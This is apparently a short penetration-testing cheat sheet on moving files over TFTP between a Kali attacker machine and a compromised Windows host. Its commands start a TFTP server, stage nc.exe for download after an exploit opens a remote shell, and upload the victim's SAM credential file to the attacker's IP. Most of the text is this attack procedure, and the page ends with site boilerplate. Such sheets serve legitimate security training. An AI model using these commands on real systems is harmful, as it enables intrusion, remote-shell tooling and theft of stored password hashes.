Note: Most corporate firewalls will block outbound traffic rendering TFTP unusable. TFTP might not be on Windows machines. Files transferred will usually be read only. Change attrib of file to delete using attrib -r filename.
Download from Attacker
Kali
atftpd --daemon --port 69 /tmp
/usr/share/windows-binaries/nc.exe /tmp
chmod 777 /tmp/nc.exe
Windows
Initiate your remote shell to the Windows PC using your exploit:
./ability-linux.py
(ability exploit, served, shell started)
`cd`
tftp -i 192.168.23.10 GET nc.exe
(on Windows Victim, IP = Kali)
Upload to Attacker
tftp -i 192.168.8.172 PUT sam
sam should now appear in /tmp on the Kali machine
Download in Windows
tftp get 2.3.5.1:/lanscan
(get the file lanscan from TFTP server 2.3.5.1)
Created By
Metadata
Favourited By
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets
More Cheat Sheets by fred